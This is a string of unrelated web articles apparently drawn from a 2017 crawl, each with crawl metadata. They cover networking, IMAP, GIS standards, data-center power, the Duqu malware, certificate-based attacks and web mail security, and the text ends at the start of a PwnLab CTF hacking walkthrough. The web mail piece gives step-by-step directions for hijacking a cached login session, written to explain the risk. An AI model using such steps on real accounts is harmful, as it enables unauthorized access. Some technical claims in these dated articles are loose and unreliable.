methylphenidate—a k a Ritalin—for treating “hyperactivity.” 1997: Julie Aigner-Clark launches Baby Einstein, a line of products claiming to “facilitate the development of the brain in infants.” 1998: Provigil hits the U.S. market. 2005: Lumosity, a San Francisco company devoted to online “brain training,” is founded. 2020: A tDCS company starts an SAT-prep service for high-school students.
<urn:uuid:20895d1f-4c9c-4508-a8c9-de4eb9427be3>
CC-MAIN-2017-09
http://www.nextgov.com/health/2014/08/prepare-be-shocked/91433/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00582-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945275
1,926
3.265625
3
Black Box Explains...Multicasting video over a LAN: Use the right switch In KVM extension applications where you want to distribute HD video across a network, you need to understand how it works and what kind of networking equipment to use with your extenders. Think of your network as a river of data with a steady current of data moving smoothly down the channel. All your network users are like tiny tributaries branching off this river, taking only as much water (bandwidth) as they need to process data. When you start to multicast video, data, and audio over the LAN, those streams suddenly become the size of the main river. Each user is then basically flooded with data and it becomes difficult or impossible to do any other tasks. This scenario of sending transmissions to every user on the network is called broadcasting, and it slows down the network to a trickle. There are network protocol methods that alleviate this problem, but it depends on the network switch you use. Unicast vs. multicasting, and why a typical Layer 2 switch isn’t sufficient. Unicasting is sending data from one network device to another (point to point); in a typical unicast network, Layer 2 switches easily support these types of communications. But multicasting is transmitting data from one network device to multiple users. When multicasting with Layer 2 switches, all attached devices receive the packets, whether they want them or not. Because a multicast header does NOT have a destination IP address, an average network switch (a Layer 2 switch without supported capabilities) will not know what to do with it. So the switch sends the packet out to every network port on all attached devices. When the client or network interface card (NIC) receives the packet, it analyzes it and discards it if not wanted. The solution: a Layer 3 switch with IGMPv2 or IGMPv3 and packet forwarding. Multicasting with Layer 3 switches is much more efficient than with Layer 2 switches because it identifies the multicast packet and sends it only to the intended receivers. A Layer 2 switch sends the multicast packets to every device and, If there are many sources, the network will slow down because of all the traffic. And, without IGMPv2 or IGMPv3 snooping support, the switch can handle only a few devices sending multicasting packets. Layer 3 switches with IGMP support, however, “know” who wants to receive the multicast packet and who doesn’t. When a receiving device wants to tap into a multicasting stream, it responds to the multicast broadcast with an IGMP report, the equivalent of saying, “I want to connect to this stream.” The report is only sent in the first cycle, initializing the connection between the stream and receiving device. If the device was previously connected to the stream, it sends a grafting request for removing the temporary block on the unicast routing table. The switch can then send the multicast packets to newly connected members of the multicast group. Then, when a device no longer wants to receive the multicast packets, it sends a pruning request to the IGMP-supported switch, which temporarily removes the device from the multicast group and stream. Therefore, for multicasting, use routers or Layer 3 switches that support the IGMP protocol. Without this support, your network devices will be receiving so many multicasting packets, they will not be able to communicate with other devices using different protocols, such as FTP. Plus, a feature-rich, IGMP-supported Layer 3 switch gives you the bandwidth control needed to send video from multiple sources over a LAN.
<urn:uuid:a762b44b-9b40-4319-bcc3-50db0108a3c4>
CC-MAIN-2017-09
https://www.blackbox.com/en-us/products/black-box-explains/black-box-explains-multicasting-video-over-a-lan-use-the-right-switch
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00106-ip-10-171-10-108.ec2.internal.warc.gz
en
0.921055
754
2.84375
3
Many of us—especially users of the Start Menu-less Windows 8—use the Windows taskbar as a quick launch bar, populating it with our day-to-day programs. Opening those programs is as simple as clicking them, but there's actually a faster way to launch software on your taskbar: Simple keyboard combinations. Every program to the right of the Start button is assigned its own numerical shortcut, with the first program being "1," the second being "2," and so on, all the way to the 10th taskbar shortcut, which gets "0." Pressing the Windows key, plus the number of the program you want to open, launches it. For example, in the image at left, pressing Win + 3 launches the Chrome browser.
<urn:uuid:30f14556-53b2-4a88-82d0-7342798fdf32>
CC-MAIN-2017-09
http://www.cio.com/article/2599302/windows/15-simple-secret-windows-tips-and-tricks-designed-to-save-you-time.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00458-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934433
156
2.5625
3
Standards are key to the interoperability and wider use of geographic information systems technology. With so muchand such disparategeo-spatial and location information available, standards are key to the interoperability and wider use of geographic information systems technology. The Open GIS Consortium, an international standards body comprising 258 companies, government agencies and universities, aims to address these connectivity issues. Founded in 1994, the Open GIS Consortium has a membership that includes organizations such as Mitre Corp., the United Nations and Harvard University. The city and county of San Francisco, which became a member last year, was one of the first to join as a local government associate member. Historically built as stand-alone applications, GIS services werent made to easily communicate with other applications and systems. The standards developed by the Open GIS Consortium, called OpenGIS Specifications, support interoperability with open interfaces and protocols. As with many standards bodies, the Open GIS Consortium has been working with Web services and XML. In February, the organization released an approved GML (Geography Markup Language) Version 3.0 implementation specification. GMLan XML grammar written in XML Schema for the modeling, transport and storage of geographic informationprovides a variety of object types for describing geography. In April, the Open GIS Consortium issued a public call for comment on the proposed OpenLS (OpenGIS Location Services) implementation specification, which defines XML for location services. The Open GIS Consortium has six guidelines for how geospatial information should be made available across any network, application or platform: Geospatial information should be easy to find, without regard to its physical location. Once found, geospatial information should be easy to access or acquire. Geospatial information from different sources should be easy to integrate, combine or use in spatial analyses, even when sources contain dissimilar types of data or data with disparate feature name schemas. Geospatial information from different sources should be easy to register, superimpose and render for display. Special displays and visualizations, for specific audiences and purposes, should be easy to generate, even when many sources and types of data are involved. It should be easy, without expensive integration efforts, to incorporate into enterprise information systems geoprocessing resources from many software and content providers. More information on the Open GIS Consortium can be found at www.opengis.org.
<urn:uuid:fe664caf-1326-4e34-b0cd-762d213796e0>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Enterprise-Networking/Open-GIS-Consortium-Focuses-on-Interoperability
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00634-ip-10-171-10-108.ec2.internal.warc.gz
en
0.894634
500
3.109375
3
IMAP – Internet Message Access Protocol is a means of getting the right of entry to an e-mail. This code of behavior is also suitable for accessing the bulletin board posts which are held in reserve on a mail server and that is perhaps communal. Additionally, that commonly well known mailing IMAP protocol is an Application layer protocol which is used to grant permission to an e-mail client to get reach to the e-mail that resides over a far flung e-mail server. IMAP 4 revision 1 is described clearly in RFC 3501. IMAP server is listened over143 port number but the port 993 number is allocated to IMAP over SSL (secure sockets layer). The key advantage of IMAP protocol is its support to both on line as well as off line functional techniques. Internet Message Access Protocol’s capability of accessing messages, either new message or saved, from multiple computers has turned out to be tremendously imperative for the reliability of electronic messaging. E-mail users with the help of IMAP can leave messages over the e-mail server which can be deleted plainly by them too. This feature of IMAP is allowed more than one client to deal with the single mailbox. Some other goals, which are connected with this protocol, are as: - Completely well-suited protocol with certain internet messaging standards such as Multipurpose Internet Mail Extensions (MIME). - Message contacts and their management, both tasks are possible from multiple computers with its help. - Provide the right of entry exclusive of dependence on less well organized file’s access protocol. - Allowed disconnected access mode too. Here is the detail of IMAP protocol times past. Originally IMAP was meant akin to the “Interactive Mail Access Protocol” as defined in RFC 1064. But later this name was altered as “Internet Message Access Protocol” when IMAP4 version was introduced. Moreover, IMAP4rev1 is intended to be upwards friendly as of the IMAP2 and it is for the most part well suited IMAP4 protocol version. Unique distant mailbox protocol IMAP was designed in the year 1986 by Mark Crispin on the contrary to POP protocol. But original version that was known as Interim Mail Access Protocol put into practice the same as Xerox Lisp user machine and a TOPS 20 server. But when another version came into existence, IMAP was known as Interactive Mail Access Protocol or IMAP2 (RFC 1064). In 1990, it was again revised and you can get its updated description in RFC 1176. IMAP3 was published later in the year 1991 as RFC 1203. IMAP2bis is supported to MIME organizational structures. The IMAP WG (IMAP Working Group), after taking the responsibility for the IMAP2bis structure was decided to rename it as IMAP4. IMAP commonly used commands with their references: Command: APPEND (RFC 3501, 3502, 4466 and 4469), Command: AUTHENTICATE (RFC 3501), Command: CHECK (RFC 3501), Command: COMPARATOR (RFC 5255), Command: COPY (RFC3501), Command: CREATE (RFC 3501, 4466), Command: DELETE (RFC 3501), Command: FETCH (RFC 3501, 4466), and Command: GETMETADATA (RFC 5464) Actually, this protocol is included definite operations of creating mailbox, removing mailbox, and renaming the mailboxes. Besides this, checking the new messages, setting flags, clearing flags and searching etc all tasks are performed efficiently. Concurrent way in support to shared the mailboxes and client software is required no information about the server’s file store set-up.
<urn:uuid:8ade354e-9c3e-44c9-8843-9fff4f1f3583>
CC-MAIN-2017-09
https://howdoesinternetwork.com/2012/imap
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00634-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939617
774
2.875
3
Every business and government is dependent upon cryptographic keys and certificates to provide trust for critical communications. These trust technologies underpin the modern world of business, establishing secure transactions and protecting access to confidential corporate data. Unlike before, when trust could be measured in terms of locks, safes and video cameras, trust today is established in such security technologies within the enterprise network that can’t be seen, only managed. As organizations adopt cloud computing and employee-owned devices have increased access to the corporate networks and sensitive information, the challenge of securing company data everywhere increases exponentially. Cryptographic keys and digital certificates establish trust in the enterprise, ensuring that corporate data remains secure whether accessed by the employee in the cube on the second floor or by an executive in a hotel room in Singapore. The attack vehicle When it comes to Advanced Persistent Threats (APTs), bad actors will take advantage of the trust gap – using any and every exploit that they can leverage to steal your organization’s data. They will look for the weakest link in your security systems and find the path of least resistance. Over the past several years, criminal organizations and individual bad actors have found that by taking advantage of poor key and certificate management practices that they can breach trust to infect systems with information-siphoning malware and in some cases even implant weaponized code that can inflict physical damage on facilities. All you have to do is look back at the past few years to realize the impact trust-based attacks have had on organizations. Organized groups have been using encryption keys and digital certificates to steal information for years, as they serve as perfect vehicles for sliding past defensive systems. Case in point: Stuxnet and Flame. These two well-known examples of malware took advantage of stolen and weak certificates. Why did the actors choose this method? Compromised certificates authenticated the malware on the network making it appear as if it was legitimate code. As a result, the infected operating systems allowed the installation of the malware without any warning. The certificate-based attack problem is ongoing and growing. In April, the Common Computing Security Standards (CCSS) forum has logged sixteen legitimate digital certificates associated with malware. In the grand scheme of things, this doesn’t sound too bad, but when you take into account that an average of 200,000 new malicious programs are found every day, the use of legitimate certificates becomes a very real problem that organizations aren’t ready to face. Cybercriminals have gone as far as setting up fake companies to deceive a public Certificate Authority (CA) into issuing legitimate certificates that could be used to distribute malware, as was the case with the Brazilian banking malware signed with a valid DigiCert certificate. Does this mean that trust-based technology is broken? Not quite. The root of the problem While each of the above exploits demonstrates the misuse of a digital certificate, it is not the technology that is the root of the failure but the proper controls over the technology. The cybercriminals behind these exploits understand that each unmanaged and unaccounted for cryptographic key and certificate deployed in an organization is a valuable asset ripe for exploitation. The problem is systemic, and the exposure is significant. Over half of all enterprises don’t know how many keys and certificates are in use, for instance. More than 60 percent of the organizations surveyed by Venafi at RSA 2013 would take a day or more to correct a CA trust compromise if they were attacked by digitally signed malware; it would take at least that long to respond to a compromised SSH key. Combine the inability to understand how trust is established with the incapacity to quickly respond when it breaks down, and you have the perfect environment for APTs and for sophisticated attackers to launch their exploits. The financial impact of these exploits can hardly be exaggerated. The average global 2000 organization must manage in excess of 17,000 encryption keys – and most of the time the keys are managed manually. The first step in self-defense is to know thyself. Your organization is fully exposed to trust exploits and the consequences of targeted and persistent attacks on intellectual property if it does not have a clear understanding of its key and certificate inventory. Cybercriminals can easily collect unencrypted data within the network, so internal data should be protected in the same manner as external data—by encryption. The lifecycle of all cryptographic keys should be securely managed with an enterprise key and certificate management solution. It’s no surprise that every organization surveyed by the Ponemon Institute for the 2013 Annual Cost of Failed Trust Report has had to respond to at least one attack on keys and certificates over the last two years. Nearly 60 percent of survey respondents at RSA 2013 stated that they were concerned about the issuance of certificates to mobile devices outside of IT control. The same percentage of respondents were also perturbed that system administrators, who are not necessarily security experts, were responsible for encryption keys and certificates. This situation can result in security breaches, unplanned outages, or audit and compliance failures. By enforcing longer key lengths, strong algorithms, frequent rotation of keys and short validity periods for certificates, you can increase your ability to reduce the threat surface. Only through automated management can you respond fast enough to a compromise and limit significant reputational and financial damage. With APTs leveraging trust technology weaknesses, it’s critical to have visibility into and control of enterprise key and certificate inventories. Cybercriminals understand that the easy targets are those organizations that have little visibility into their threat surface and cannot respond quickly. As an industry, we need to gain control over trust and plug the gap related to key and certificate-based exploits.
<urn:uuid:033032d4-3f08-4237-9957-d2b498f251e3>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2013/05/27/plugging-the-trust-gap/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00634-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950549
1,142
2.625
3
What do field sales people, home teleworkers, medical personnel, and any one working remotely from a central site have in common? A need for up to the minute information. One of the most successful models for using the Internet for business is the information dissemination model. One of the most common method for business communication today is email. Email can be sent/received in many ways; pagers, cell phones, and the like. However, one email communication option that holds promise for increased and more timely information flow is web based email systems. However, many businesses choose to not deploy web mail due to perceived security risk of web based applications in general. More specifically, not wanting to increase the risk of exposing corporate mail systems to external threats. Viruses, spam, worms, and other malicious attacks and non-malicious events can bring email infrastructures to their knees. With recent government legislation in countries such as the U.S., email confidentiality has become a growing concern. So, what approaches are there for deploying web mail systems in a secure manner? What are the options for web mail deployment? Understanding how web mail system work can help in deciding if web mail systems can be securely deployed. Web Mail Security Goals Most web mail systems are designed using a multi-tiered architecture. Usually, a web server serves as a reverse proxy to a backend email server that actually services the users mail requests. Most web mail systems use a separate database to store the mail versus the user authentication information. The main security issues for web mail are: Identity management, privacy, data integrity and availability. Part of identity management is user authentication. User identity verification is important because without verifying the identity of sender or receiver identity theft can occur. Fortunately, many web mail systems support a wide range of authentication schemes. For example, web mail user authentication can be done using authentication protocols native to the mail server O/S or 3rd party authentication methods such RADIUS, LDAP or SecureID. Privacy has to do with keeping information from unauthorized exposure. The primary method for ensuring privacy is the use of cryptography. Various cryptographic schemes are in use today. PGP and S/MIME, both widely implemented in the form of browser plug-ins and/or integration API, are widely used and well understood. Both PGP and S/MIME encrypt the message itself. SSL and IPSec encrypt at lower levels of session and network layers. SSL is the more widely used security protocol for basic web mail. Data integrity has to do with protection from unauthorized modification of email. Data integrity can be preserved by cryptographic techniques such as hashing and signing of messages. PGP and S/MIME provide the facility of digitally signing messages in such a way that tampering with the data will result in missed matched message hash results. Availability involves ensuring that the web mail system is as accessible as possible. The use of redundant servers, load balancing and fail over, and server clustering are all common ways to increase the probability that the web mail system will be available at the right time. An added plus to redundancy is continuous availability even during maintenance windows. After a web mail user is positively identified and authorized the next step is to initiate retrieval of that users’ email. Using a set of stored procedures and scripts, the web server formats the user HTML requests so that the back end email server can serve up mail. The usual backend mail server includes Microsoft Exchange, Netware Mail or Lotus Notes. Each of these systems includes a web mail service that uses default ports of 80 for HTTP and 443 for HTTP/SSL. Most web mail policies require the use of HTTP over an encrypted channel such as Secure Sockets Layer (SSL) or Secure Shell protocol (SSH). In rare cases, the IP security (IPSec) is used as the secure communication channel for web mail systems. After the user has finished sending / receiving and viewing mail the user will either log out or simply close the web browser. What happens next is dependent on the specific session management design of the web mail solution. The Cookie Problem The issue with web mail session management is centered around how session cookies are managed. Session cookies are files containing information about the state of the session. The web mail server records this information in a text file and stores this file on the web mail user’s hard drive (web browser). The session cookie sometimes contains authentication information along with the usual information about such things as the last URL (page) that the user viewed. By design this makes it easier for the user to move from one page of mail to the next without having to re-authenticate for page change. The problem comes though when the user “logs off”. If the web mail system does not erase the session cookie stored on the users computer and if the user does not close their browser, an attacker can easily re-log in to the web mail system while impersonating the authorized user. Why does this happen? Because the session cookie, which contains in some cases the authentication information, is still cached in the browser. This is a major security flaw in the design of several web mail systems. How does this happen? 1. The attacker presses the “back” browser button, 2. The attacker is presented with the web mail logon dialog screen (if using standard HTTP authentication) 3. Attacker simply presses the “OK” button – Voila! The attacker is now logged in as the authorized user. This vulnerability alone is enough for many security conscious organization to not allow web mail access unless some countermeasure to the “log off” problem is deployed. Small wonder why web mail access requests are greeted with suspicion. Fortunately, there are countermeasures that are available to reduce risk of such attacks on web mail systems. Web Mail Security Approaches There are three ways that web mail security can be done: 1. Development In-house 2. Deploy a web mail Security technology/product 3. Outsource to 3rd party Many businesses refuse to deploy web mail due to concerns over security issues inherent to web based access to mail. Figure 1 highlights some of the issues that are, in fact, valid concerns. However, there are countermeasures that can be applied to mitigate most of the security issues. One such countermeasure is application knowledge. Having security minded development staffs who are properly trained in secure software development principles could minimize poor programming habits that introduce vulnerabilities into the web mail application. A resource to organization who are establishing secure programming standards include: Foundstone, or online training available from the International Webmasters Association IWA-HWG. Also, a well-written guide in secure application development can be found here. These resources can be used to establish a baseline of secure programming ideas within an organization. The second approach is the use of security technology. Technology is available now that be immediately deployed as a protective layer around a web mail infrastructure. Most of these products are based on the idea of a reverse proxy. The difference in products is the technology being used to implement the reverse proxy functionality. For example, IronMail email security appliance from CipherTrust uses hardened version of Apache as the reverse proxy. The IronMail appliance features a protocol anomaly- based intrusion detection system built in to the secure web mail application on the appliance. The IDS can detect several hundred known exploits unique to web mail. In addition, classes of exploits such as buffer overflow, directory traversal, path obfuscation, and malformed HTTP requests. As an all-in-one approach to web mail security there are few such products that do the job as well. Outsourced Web Mail service A third approach to web mail security is via out-sourced or hosted web mail service. Yahoo and MSN provide a webmail access. However, very few people using their services would rate such services as ‘secure’. Thus the need for business class level of secure web mail access provided by managed security service providers such Co-Mail. The Co-Mail secure mail service, offered by Ireland based NR Lab LTD, provides a web based secure email service with a user interface that can be used by anyone. Co-Mail security architecture allows this service to be a good choice for any size organization. Co-Mail allows a company to use its own or a Co-Mail registered domain for mail routing. This mail service provides mail confidentiality and is cryptography based on OpenPGP and SSL. Other security features of this on line email service include, rudimentary anti spam, file encryption, strong user authentication via (optional) Rainbow iKey support. Through an administrative web interface an admin can register for the service, set up new users among other housekeeping tasks. From the admin interface can be viewed organizational email statistics such as near-immediate or historical user account activity. The administrator can customize the look and feel for end user by uploading company logo’s, modifying the background header, and selecting header text color. In addition, a company can use its own domain name or become a sub domain to the Co-Mail service. Co-Mail can integrate into the end user’s current email environment via a downloadable proxy software called Co-Mail Express. Co-Mail Express is a light weight-software application that resides on the end users desktop tray. Its job is to intercept mail directed to port 25 in order to encrypt/decrypt a mail message. Although this feature is not mandatory, some may find helpful if web based mail interfaces are not your cup of tea. Once an end user logs into the service, the user can perform the usual email tasks such sending and receiving mail. In addition, the user can encrypt/decrypt files for secure storage using the Encrypt/Decrypt option within the Co-Mail web interface or the Co-Mail Express interface. The user can also manage the address book, export the address book, turn on/off antispam, set up auto reply texts and so on. Although, very easy to use for small to medium user communities, traditional large enterprises may be hesitant to outsource their entire email service to a third party. ISPs in particular may want to think seriously about this service value to their customers. This service is worth a look due to potential cost savings in up front setup, and ongoing maintenance. Lower cost and implementation speed are two reasons a large may want to outsource its email system Co-Mail. However, the strength of the security employed by the service provider is also a central concern. Technical details for Co-Mail are available here. Web mail is becoming more acceptable as security awareness increases. While security knowledge helps, management commitment is a key for development of in-house web mail solutions. There is a trend in the secure web mail technology sector toward the use of appliances that provide web mail protection as well as other email infrastructure security objectives. The appliance approach simplifies management and requires internal knowledge of how to handle the web mail security. Service-based web mail reduces the up front cost of self-deployment and ongoing management. Prefer service based web mail services that understand the threat environment of web mail and provide security and scalability that can respond to your business environment.
<urn:uuid:fa81197d-3336-40ae-b44a-390b71a8e421>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2004/01/27/secure-web-based-mail-services/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00334-ip-10-171-10-108.ec2.internal.warc.gz
en
0.921085
2,282
2.578125
3
A new version of the installer for "Son of Stuxnet" virus Duqu is a rare value. Not only does it include what is currently the hottest malware on the market, it uses a previously unknown vulnerability in the Windows kernel that accepts code executed elsewhere as having originated within the victim's machine. The variant was discovered by the CrySyS Lab at the Budapest University of Technology and Economics, which discovered the original version of Duqu – a virus that shares much of the same code that made Stuxnet so effective, but is designed as a remotely targeted spy rather than saboteur. It is housed within a Word document that, when opened, uses the kernel flaw to install Duqu and launch an attack, though Symantec researchers found this variant was designed to be installed only during eight days in August. Symantec also provided a schematic of the process Duqu follows to exploit the flaw and install itself. The remote-execution flaw makes Duqu more dangerous and better able to penetrate secure facilities because it allows infected machines to communicate with each other rather than directly with a command controller outside the firewall. Once installed in one machine, this version of Duqu spreads itself to other machines, using an encrypted file-sharing protocol to communicate with one machine that has a confirmed open link to the outside. In that way it can spread across many servers within a secure environment without tripping alarms designed to be on the lookout for viruses phoning home from every machine they infect. "Duqu creates a bridge between the network's internal servers and the C&C server. This allowed the attackers to access Duqu infections in secure zones with the help of computers outside the secure zone being used as proxies," according to Symantec's analysis. So far, according to Kaspersky Labs, Duqu infections have been recorded only in Sudan and Iran, though there is no obvious connection to Iran's nuclear program, which Stuxnet was designed to attack. Duqu is different from Stuxnet in that it is a framework within which a number of different drivers, modules and encryption methods can be used to attack weaknesses peculiar to a specific target. It is highly customizable, can accept uploads from its command-and-control servers of new drivers or modules to overcome obstacles, and has full access to the infected machine's registry, so its structure on one system may be changed completely from the pattern on another, according to Kaspersky's report. Original reports about the virus said it was set to end its own infection after 36 days; Kaspersky's results indicate even the length of time it infects a system is variable. There is no truth to the report – according to the overly credible, obviously naive researchers at security companies – that Duqu can actually manifest itself outside the computer, attack and absorb the mass of warm-blooded organisms, then take on their shape and mimic them until it gets the chance to attack again. Despite the huge number of Hollywood movies depicting this exact scenario – not to mention the 70-page scientific report disguised as a 1938 science-fiction-classic short story called Who Goes There by John W. Campbell – security researchers insist Duqu is simply a software construct of unusually clever design, apparently intended for industrial espionage. That seems like a huge waste of such something so creative, adaptable and diabolical, though – like using the power of invisibility to make sure your neighbors haven't torn the labels marked Do Not Remove On Pain of Law off their mattresses. I expect, even if it won't end up eating anyone, that we can look forward to a lot more creative mayhem and destruction from whoever wrote and directs Duqu. Unless it's the U.S. and Israeli governments, again, in which case it will stick with relatively dull things that bring limited confusion to the enemy, but only after extensive cost justification and IT-environmental impact statements. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:67b27ba3-5592-4102-beae-78ef30ce6eaf>
CC-MAIN-2017-09
http://www.itworld.com/article/2736405/security/new-version-of-duqu-even-smarter-than-the-last---son-of-stuxnet--may-be-a-monster--not-a-virus.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00510-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951456
855
2.546875
3
The National Telecommunications & Information Administration (NTIA) has published an online guide to the wireless spectrum being used by federal agencies. Launched on April 11, Spectrum.gov gives readers a glimpse into how the federal government is using its allotment of wireless frequencies in the 225 MHz to 5 GHz bands. The new resource also provides a map showing what federal systems are using spectrum throughout the U.S. “Just as commercial broadband providers are facing growing demands for spectrum to fuel the explosion of new wireless devices, federal agencies’ demand for spectrum also is growing,” said Karl Nebbia, NTIA associate administrator, Office of Spectrum Management, in a blog post announcing the new website. “NTIA’s compendium shows agencies need spectrum for crucial tasks ranging from military flight testing to air traffic control to weather forecasting.” Each spectrum use report is categorized by sections of particular bandwidth. Links to each band lead to a .pdf document that gives an overview of the band, how the frequencies within it are allocated, current federal agency use, and where applicable, planned future use. The shrinking availability of wireless spectrum has been a hot topic over the past several years as more communications devices have entered the marketplace and need bandwidth to operate. The wireless industry has been pushing for release of more spectrum to accommodate private-sector demand. Nebbia indicated in his blog post that Spectrum.gov would be updated regularly, calling the site “an important resource” as the federal government looks to repurpose federal spectrum for commercial use.
<urn:uuid:b6b2a827-87d0-4409-9efb-87e7e145cf24>
CC-MAIN-2017-09
http://www.govtech.com/internet/NTIA-Launches-Wireless-Spectrum-Webpage.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00102-ip-10-171-10-108.ec2.internal.warc.gz
en
0.932276
316
2.625
3
You need to learn a whole new vocabulary when you start talking with your company's facilities team about lowering data-center energy use. If you thought IT acronyms were hard to remember, wait until you sit down with your facilities team to discuss your data center's electric bill. You need to learn a whole new vocabulary when you start talking about lowering the building's energy use. Here's a crib sheet of a dozen of the most commonly used energy terms and acronyms so you can learn the jargon for going green. Yes, this is the name of Australia's greatest rock band, but it's also a key trend in data-center design. AC stands for alternating current, and DC stands for direct current. Leading-edge data-center designers are looking at power supplies based on DC power -- rather than today's AC power -- because DC power promises to be more energy efficient. 2. Carbon footprint No relation to Sasquatch, although to corporate executives it can be an equally large and scary beast. A company's carbon footprint is the amount of CO2 emissions its operations produce. In setting goals to reduce their carbon footprint, many companies target their data centers because they consume 25% or more of the electric bill. It sounds like the acronym for the Chicago Fire Department, but this version stands for computational fluid dynamics. CFD high-performance-computing modeling has been used for a long time in the design of airplanes and weapon systems. Now it's being applied to air flow in data centers for optimal air-conditioning design. This isn't what you drink at the beach on a hot day. Rather, it's a machine that uses chilled water to cool and dehumidify air in a data center. Of all the components of a data center's air conditioning system, this is the one that consumes the most amount of electricity -- as much as 33% of a data center's power. 5. Close-coupled cooling This sounds like a technique that would come in handy on Valentine's Day. In fact, it's a type of data-center air-conditioning system that brings the cooling source as close as possible to the high-density computing systems that generate the most heat. Instead of cooling down the entire room, close-coupled cooling systems located in a rack cool the hot air generated by the servers in just that rack. This is not what you sometimes see when a plumber bends over, although it's pronounced the same way. We're talking about a computer-room air-conditioning system. CRAC units monitor a data center's temperature, humidity and air flow. They consume around 10% of a data center's power. This acronym has nothing to do with the nation's capital, although its pronunciation is similar. DCiE is the Data Center Infrastructure Efficiency metric (also called DCE for Data Center Efficiency). DCiE is one of two reciprocal metrics embraced by The Green Grid industry consortium; the other is Power Usage Effectiveness (PUE, below).(See "Two ways to measure power consumption.") DCiE shows the power used by a data center's IT equipment as a percentage of the total power going into the data center. A DCiE of 50% means that 50% of the total power used by a data center goes to the IT equipment, and the other 50% goes to power and cooling overhead. The larger the DCiE, the better. Electric power is sold in units called kilowatt hours, 1 kWh is the amount of energy delivered in one hour at a power level of 1000 watts. This abbreviation for "kilowatt hour" is mostly used in writing rather than conversation. The acronym PDU stands for power distribution unit, a device that distributes electric power. PDUs function as power strips for a data center and consume around 5% of the power in a typical center. Not pronounced like the reaction to a bad odor, but one letter at a time. Power Usage Effectiveness is one of two reciprocal metrics embraced by The Green Grid industry consortium; the other is Data Center Infrastructure Efficiency (DCiE, above). PUE is the ratio of the total power going into a data center to the power used by the center's IT equipment. For example, a PUE of 2 means that half of the power used by the data center is going to the IT equipment and the other half is going to the center's power and cooling infrastructure. Experts recommend a PUE of less than 2. The closer a PUE is to 1, the better. Pronounced like the short version of the word recreation, this acronym means renewable energy certificates or renewable energy credits. RECs are tradable commodities that show that 1 megawatt-hour of electricity was purchased from a renewable source, such as solar, wind, biomass or geothermal. An increasing number of companies are buying RECs to offset the amount of electricity generated from fossil fuels that their data centers consume. We're not talking about the boys in brown, although the acronym is pronounced the same way. We're talking about uninterruptible power supply, which provides battery backup if a data center's power fails. It's essential that UPS equipment be energy efficient, because it consumes as much as 18% of the power in a typical data center. < Return to main NDC page: Power: What you don’t know will cost you > Learn more about this topicEnergy-efficiency self-assessment tool 02/18/08Two ways to measure power consumption 02/18/08Where to turn for advice about power
<urn:uuid:6be2a613-a554-4405-a1d1-09251fd265fd>
CC-MAIN-2017-09
http://www.networkworld.com/article/2283259/data-center/data-center-power-glossary.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00454-ip-10-171-10-108.ec2.internal.warc.gz
en
0.937866
1,149
3.078125
3
Apache Spark - an open source project - is an application framework for doing highly iterative analysis that scales to large volumes of data. Through its powerful engine and tooling, Apache Spark significantly lowers the barrier to entry for building analytics applications. This brief introduces the Apache Spark platform and explains how it can be used to create analytics applications based on machine learning. Kathryn Cave looks at the big trends in tech Rupert Goodwins’ unique angle on tech change Phil Muncaster reports on China and beyond
<urn:uuid:8d214dc6-9cdb-460d-bf7b-f5dc9db49d63>
CC-MAIN-2017-09
http://www.idgconnect.com/view_abstract/35014/the-next-wave-intelligent-applications-powered-apache-spark
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00450-ip-10-171-10-108.ec2.internal.warc.gz
en
0.86618
105
2.625
3
Welcome back everyone! This is the first in a new series we’re launching that will walk you through various capture the flag (CTF) challenges. In order to ease into this new series we’re going to take a minute now to detail what a CTF challenge is (for those of you that don’t already know). Then, we’ll get hacking at the PwnLab: init CTF challenge. So, let’s get started! What is a CTF Challenge? Simply put, a CTF challenge is a system that has been intentionally configured with vulnerable software for the sole purpose of hacking. When hacking a CTF the “player” (attacker) must find and exploit these vulnerabilities in order to gain access to a text file containing the flag. Once the flag has been read, the game is won! You may be wondering how this helps us become better hackers. Well, my direct answer to that question is: practice makes perfect! If we really take the time to play these CTF challenges, we become exposed to a far wider range of attacks than we’d normally see. By seeing and using these attacks ourselves, we gain a better understanding of how they work, which in turn makes us better hackers. Now that we know what a CTF is and the perks gained from playing them, let’s get started at hacking our first CTF challenge! Hacking the PwnLab: init CTF The first CTF challenge we’ll be taking a crack at is PwnLab: init. This is meant to be a relatively easy CTF to complete, so it’s a perfect candidate to start us out! When we download PwnLab, it comes as a VM, so we can run it inside VirtualBox, which is what we’ll be doing here. This CTF can get a bit lengthy, so we’re going to split the pwnage up into two parts. This part will be reconnaissance and preparing the attack, and the next part will be exploitation and privilege escalation. Let’s get hacking! Step 1: Finding the Target If we’re going to hack PwnLab, we need to know it’s address! Since PwnLab is configured to automatically pull an IP address via DHCP, we need to have a scan running in 